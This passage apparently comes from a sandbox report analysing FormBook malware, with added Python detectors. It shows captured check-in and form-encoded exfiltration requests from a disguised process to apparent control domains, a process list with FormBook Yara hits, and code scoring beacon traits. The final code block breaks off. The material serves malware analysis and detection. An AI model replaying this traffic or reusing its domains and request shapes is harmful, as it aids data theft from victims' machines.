                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.2.10 | 49997 | 104.21.44.16 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:21.181832075 CET | 1727 | OUT | POST /stfe/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.3kw40881107247y.click
                                                            Origin: http://www.3kw40881107247y.click
                                                            Referer: http://www.3kw40881107247y.click/stfe/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 44 54 43 34 31 41 43 77 64 38 2b 6b 78 58 58 38 31 63 65 47 46 36 48 37 69 71 2b 52 31 43 69 62 34 6e 42 34 65 48 4f 53 55 6b 46 79 42 36 34 63 51 6f 30 33 48 6b 34 55 6f 52 38 7a 31 32 69 4c 34 34 49 33 4f 72 4f 53 66 53 42 4e 46 44 56 61 53 32 30 43 4a 2b 4a 37 4b 68 46 75 48 2b 59 34 64 53 36 47 31 49 62 42 70 63 46 74 68 36 2b 79 6a 49 70 5a 30 37 34 6f 7a 53 5a 36 59 51 34 33 34 78 4d 6a 51 6a 46 71 77 4d 4f 6d 5a 49 44 61 30 56 6d 44 47 33 4c 73 4b 45 39 4b 30 2b 44 66 4d 6e 50 54 65 46 38 4c 6f 65 41 50 4a 4a 59 39 7a 78 57 51 56 30 54 56 77 78 79 49 2f 33 75 36 72 79 78 34 66 4c 64 4a 44 63 56 6b 49 48 34 52 61 58 4c 78 57 6e 56 6a 69 70 30 45 79 53 76 62 50 2b 37 2f 48 38 50 78 36 4f 34 4a 65 6c 69 50 47 36 7a 6a 71 54 41 4b 76 4e 74 38 6f 78 30 4a 49 78 59 66 79 36 79 50 71 77 52 47 66 7a 56 69 61 75 6f 79 6b 2f 30 69 43 5a 57 43 70 4b 36 55 59 70 6e 32 2b 4e 55 37 6c 6d 2f 53 57 52 76 57 61 35 37 71 37 2b 62 77 6a 31 62 6c 4c 39 74 41 42 59 37 4a 6f 55 4c 4f 57 31 53 54 6c [TRUNCATED]
                                                            Data Ascii: 9HaD=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 [TRUNCATED]
                                                            Nov 24, 2024 08:15:22.273236036 CET | 898 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:22 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LcPh%2FKNuOOVm%2FpjcbMQLpLUJyTcXZyZwgrQaAW31bwVtTvuWDVRHOkwVQekiOxQdGXzcVsAfO4esPjdR8AF24eZ%2FSbNuFZOlInZj2lDjtaJO6RZ3xRydUBvA5tLQBZJD5Yw6Ncxk1WSXXHh"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e779b7f19664392-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1573&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1727&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.2.10 | 49998 | 104.21.44.16 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:23.833026886 CET | 409 | OUT | GET /stfe/?wdv4=1RD4&9HaD=ORqY22CcDufF1m336sq5Rb7ktLrp91WB7UJGYn2fYGIkb40HC4QAI0Uo1DAA/E2P6coBVsarHDRzXgtbaXIBPtY5QkEUWLhgXwOO0YSIlO9ptKaJ+w== HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.3kw40881107247y.click
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:15:24.989691973 CET | 912 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:24 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjFf8F8XyA3lxztUDi8UFjl52I2VDdkS5WewFsuUDLrY6XzXLZvZNVWGInnRDPaJGZOo02PsbnoXPI6ugaQpVjJ1O4LHeFk%2Bc8%2Fyib8XE1ljIMpedAB1nc2fZdzAdfIv9CzTV%2BN4fzx%2BIEZe"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e779b900e8b80da-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1478&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=409&delivery_rate=0&cwnd=128&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            25 | 192.168.2.10 | 49999 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:30.564306021 CET | 666 | OUT | POST /cclj/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.heliopsis.xyz
                                                            Origin: http://www.heliopsis.xyz
                                                            Referer: http://www.heliopsis.xyz/cclj/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 78 38 42 64 67 38 65 4e 68 70 73 42 4a 50 45 71 44 31 57 59 54 6b 72 33 52 37 6e 6c 43 58 65 56 48 4b 4f 52 75 64 30 52 70 32 57 34 6d 57 55 6a 57 55 6a 6a 55 38 55 6e 68 51 43 64 4d 50 79 4d 5a 41 78 4e 58 68 55 35 6a 45 45 7a 66 6e 72 5a 74 38 69 4d 4c 2b 41 5a 71 38 4c 6d 43 76 56 78 67 6f 42 55 32 6e 6d 57 62 4d 69 6a 32 51 62 68 6a 4b 57 67 53 73 68 43 75 69 39 57 4a 4d 38 78 4f 66 71 4e 6e 47 53 70 57 49 2f 79 53 39 74 79 39 45 38 6d 4e 44 6b 30 71 4e 69 67 64 4b 7a 6c 49 72 6f 4a 6a 2f 68 57 36 59 38 4c 69 4b 76 50 6a 55 2f 6f 6d 4b 50 70 61 50 32 31
                                                            Data Ascii: 9HaD=x8Bdg8eNhpsBJPEqD1WYTkr3R7nlCXeVHKORud0Rp2W4mWUjWUjjU8UnhQCdMPyMZAxNXhU5jEEzfnrZt8iML+AZq8LmCvVxgoBU2nmWbMij2QbhjKWgSshCui9WJM8xOfqNnGSpWI/yS9ty9E8mNDk0qNigdKzlIroJj/hW6Y8LiKvPjU/omKPpaP21


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            26 | 192.168.2.10 | 50000 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:33.228332043 CET | 690 | OUT | POST /cclj/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.heliopsis.xyz
                                                            Origin: http://www.heliopsis.xyz
                                                            Referer: http://www.heliopsis.xyz/cclj/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 78 38 42 64 67 38 65 4e 68 70 73 42 49 73 73 71 47 56 71 59 62 6b 72 30 64 62 6e 6c 4c 33 66 53 48 4b 79 52 75 63 41 37 70 45 79 34 6d 33 6b 6a 58 52 44 6a 52 38 55 6e 75 77 43 45 43 76 7a 43 5a 41 39 76 58 6a 41 35 6a 45 34 7a 66 6d 62 5a 78 66 61 4c 52 4f 41 4d 73 38 4c 34 4d 50 56 78 67 6f 42 55 32 6a 50 39 62 4d 71 6a 32 44 44 68 67 76 36 6a 63 4d 68 44 70 69 39 57 44 63 38 74 4f 66 71 6a 6e 43 4b 54 57 4f 7a 79 53 39 64 79 38 51 67 6c 57 54 6b 79 33 64 69 31 53 34 58 71 4f 62 4d 4e 36 4a 4e 48 34 4c 45 2f 68 72 53 49 79 46 65 2f 31 39 54 6e 55 4a 44 66 69 6d 50 4d 34 32 4e 44 70 69 33 70 4a 64 54 68 44 6e 2b 6b 44 67 3d 3d
                                                            Data Ascii: 9HaD=x8Bdg8eNhpsBIssqGVqYbkr0dbnlL3fSHKyRucA7pEy4m3kjXRDjR8UnuwCECvzCZA9vXjA5jE4zfmbZxfaLROAMs8L4MPVxgoBU2jP9bMqj2DDhgv6jcMhDpi9WDc8tOfqjnCKTWOzyS9dy8QglWTky3di1S4XqObMN6JNH4LE/hrSIyFe/19TnUJDfimPM42NDpi3pJdThDn+kDg==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            27 | 192.168.2.10 | 50001 | 13.248.169.48 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:35.885054111 CET | 1703 | OUT | POST /cclj/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.heliopsis.xyz
                                                            Origin: http://www.heliopsis.xyz
                                                            Referer: http://www.heliopsis.xyz/cclj/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 78 38 42 64 67 38 65 4e 68 70 73 42 49 73 73 71 47 56 71 59 62 6b 72 30 64 62 6e 6c 4c 33 66 53 48 4b 79 52 75 63 41 37 70 45 36 34 6d 46 73 6a 57 33 4c 6a 57 38 55 6e 6a 51 43 42 43 76 7a 50 5a 41 31 72 58 6a 38 48 6a 42 30 7a 5a 77 76 5a 39 2b 61 4c 66 2b 41 4d 75 38 4c 6c 43 76 55 7a 67 6f 52 51 32 6e 72 39 62 4d 71 6a 32 46 48 68 33 71 57 6a 52 73 68 43 75 69 39 4b 4a 4d 38 4a 4f 65 43 56 6e 43 47 44 56 2b 54 79 53 5a 78 79 77 46 38 6c 61 54 6b 77 30 64 6a 77 53 34 71 71 4f 62 51 37 36 4e 46 74 34 49 6b 2f 78 38 69 66 75 47 6d 6a 67 37 66 69 56 71 33 4e 76 51 58 76 2b 30 42 47 71 6a 7a 2b 4b 63 32 47 46 6e 58 7a 57 4a 49 4b 30 42 41 54 73 32 31 4e 48 4e 31 57 34 37 63 54 51 64 43 67 62 6f 70 4f 46 46 38 38 35 72 43 79 33 41 65 55 4c 42 4f 75 58 62 72 4f 56 34 34 76 6d 79 4a 6a 38 53 77 70 6d 50 6e 41 32 55 57 34 49 46 35 35 57 55 31 75 5a 48 39 6d 52 6d 2f 42 64 5a 69 75 5a 30 56 4e 62 68 32 4e 4b 33 6f 4c 41 7a 55 75 2f 58 57 4c 34 70 6a 36 4e 51 51 4c 4d 74 31 55 2f 6e 6d 37 77 [TRUNCATED]
                                                            Data Ascii: 9HaD=[...] [TRUNCATED]


                                                            Session ID: 28
                                                            Source IP: 192.168.2.10
                                                            Source Port: 50002
                                                            Destination IP: 13.248.169.48
                                                            Destination Port: 80
                                                            PID: 6048
                                                            Process: C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe

                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:38.535698891 CET | 401 | OUT | GET /cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.heliopsis.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:15:39.670455933 CET | 386 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sun, 24 Nov 2024 07:15:39 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 246
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 48 61 44 3d 38 2b 70 39 6a 49 2b 57 38 70 34 67 47 66 6b 72 4a 30 36 49 62 47 37 47 56 72 44 72 46 45 33 39 47 62 65 76 69 37 4d 4d 6f 47 2f 6d 78 56 30 4f 4a 33 62 42 51 36 5a 66 7a 48 47 69 49 65 62 4a 44 7a 78 64 4a 55 38 33 35 67 6f 76 4b 33 57 71 33 2f 32 4f 58 63 55 62 36 70 7a 6a 4c 66 38 77 69 71 46 77 2f 51 48 63 59 4d 4b 34 73 79 7a 6a 69 41 3d 3d 26 77 64 76 34 3d 31 52 44 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4"}</script></head></html>
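The exchange above has the shape of a FormBook check-in: a GET to a short alphanumeric directory (/cclj/) whose query holds one 4-character key with a base64-looking blob and a second 4-character key with a 4-character value, followed by a form-encoded POST to the same directory with Origin and Referer pointing back at it, all sent with a Firefox 36 User-Agent (a 2015 browser build). The Python below is an added example written for this page, not Joe Sandbox or Suricata code; it parses raw request text and scores those features. The GET is the request captured above, the POST reuses the captured headers with an assumed request line and a dummy body (only its headers appear in this excerpt), and the third request is benign filler for contrast.

```python
import re
from urllib.parse import urlsplit


def _req(lines, body=""):
    """Join header lines into a raw HTTP/1.1 request string."""
    return "\r\n".join(lines) + "\r\n\r\n" + body


# User-Agent string exactly as captured in the report.
UA = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)"

# Constructed samples: GET as captured, POST partly assumed, benign filler.
GET_SAMPLE = _req([
    "GET /cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4 HTTP/1.1",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-US,en;q=0.5",
    "Host: www.heliopsis.xyz",
    "Connection: close",
    "User-Agent: " + UA,
])

POST_SAMPLE = _req([
    "POST /cclj/ HTTP/1.1",  # request line assumed; not visible in the excerpt
    "Host: www.heliopsis.xyz",
    "Origin: http://www.heliopsis.xyz",
    "Referer: http://www.heliopsis.xyz/cclj/",
    "Content-Type: application/x-www-form-urlencoded",
    "Content-Length: 9",
    "Connection: close",
    "User-Agent: " + UA,
], "9HaD=AAAA")  # dummy body standing in for the 1229-byte encrypted blob

BENIGN_SAMPLE = _req([
    "GET /search?q=openresty+redirect&hl=en HTTP/1.1",
    "Host: www.example.com",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36",
])

SHORT_DIR = re.compile(r"^/[A-Za-z0-9]{2,8}/$")      # e.g. /cclj/
B64ISH = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")    # long base64 blob, optional padding
LEGACY_FF = re.compile(r"rv:36\.0\) Gecko/20100101 Firefox/36\.0")


def parse_request(raw):
    """Split a raw request into (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def formbook_indicators(raw):
    """Return the list of FormBook-style traits present in one request."""
    method, target, headers, _body = parse_request(raw)
    url = urlsplit(target)
    hits = []
    if SHORT_DIR.match(url.path):
        hits.append("short_alnum_directory")
    if method == "GET":
        # Split manually: parse_qsl would turn '+' inside the blob into spaces.
        pairs = [p.split("=", 1) for p in url.query.split("&") if "=" in p]
        if (len(pairs) == 2
                and all(len(k) == 4 and k.isalnum() for k, _ in pairs)
                and B64ISH.match(pairs[0][1])
                and len(pairs[1][1]) == 4):
            hits.append("two_param_base64_query")
    if method == "POST":
        referer_path = urlsplit(headers.get("referer", "")).path
        if (headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
                and referer_path == url.path):
            hits.append("form_post_to_same_directory")
    if LEGACY_FF.search(headers.get("user-agent", "")):
        hits.append("firefox_36_user_agent")
    return hits


def is_formbook_like(raw, threshold=3):
    """Verdict: three or more traits in a single request."""
    return len(formbook_indicators(raw)) >= threshold
```

Score the request shape, not the reply. A 200 OK proves nothing here: the response above is an openresty parking page that only redirects to /lander, and FormBook samples contact a list of decoy domains alongside the real controller, so a domain in the beacon list is not automatically live infrastructure.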


                                                            Target ID:2
                                                            Start time:02:12:36
                                                            Start date:24/11/2024
                                                            Path:C:\Users\user\Desktop\VSP469620.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\VSP469620.exe"
                                                            Imagebase:0xab0000
                                                            File size:1'207'808 bytes
                                                            MD5 hash:E4CB2AC542D27B0C73C5A290BF5FFE77
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:02:12:37
                                                            Start date:24/11/2024
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\VSP469620.exe"
                                                            Imagebase:0xfe0000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:02:13:21
                                                            Start date:24/11/2024
                                                            Path:C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe"
                                                            Imagebase:0x740000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:7
                                                            Start time:02:13:24
                                                            Start date:24/11/2024
                                                            Path:C:\Windows\SysWOW64\icsunattend.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\icsunattend.exe"
                                                            Imagebase:0x6c0000
                                                            File size:13'824 bytes
                                                            MD5 hash:6D01FCE30EF8A2CA0D385593E90879E5
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:10
                                                            Start time:02:13:36
                                                            Start date:24/11/2024
                                                            Path:C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe"
                                                            Imagebase:0x740000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:12
                                                            Start time:02:13:49
                                                            Start date:24/11/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff613480000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true
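Two details in the process list above are worth turning into a repeatable check. Target ID 4 runs as C:\Windows\SysWOW64\svchost.exe yet carries the dropper's command line ("C:\Users\user\Desktop\VSP469620.exe"), which is what a process looks like when its image is replaced after creation; and the FormBook Yara hits in Targets 4, 6, 7 and 10 sit in dump regions whose protection field is 0x40 (PAGE_EXECUTE_READWRITE), apart from two 0x04 (PAGE_READWRITE) regions in Target 7. The Python below is an added example for this page, not code from the Joe Sandbox report or product; it encodes the entries above as data and applies both checks. The dump-name field layout it assumes (target ID, sequence number, internal ID, region base address, page protection, further flags, all hexadecimal) is read off the names themselves and is not a documented format.

```python
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath


@dataclass
class ProcEntry:
    target_id: int
    path: str
    cmdline: str
    yara_sources: list = field(default_factory=list)


# Constructed from the Target ID entries listed in the report above.
PROCS = [
    ProcEntry(2, r"C:\Users\user\Desktop\VSP469620.exe",
              r'"C:\Users\user\Desktop\VSP469620.exe"'),
    ProcEntry(4, r"C:\Windows\SysWOW64\svchost.exe",
              r'"C:\Users\user\Desktop\VSP469620.exe"',
              ["00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp",
               "00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp",
               "00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp"]),
    ProcEntry(6, r"C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe",
              r'"C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe"',
              ["00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp"]),
    ProcEntry(7, r"C:\Windows\SysWOW64\icsunattend.exe",
              r'"C:\Windows\SysWOW64\icsunattend.exe"',
              ["00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp",
               "00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp",
               "00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp"]),
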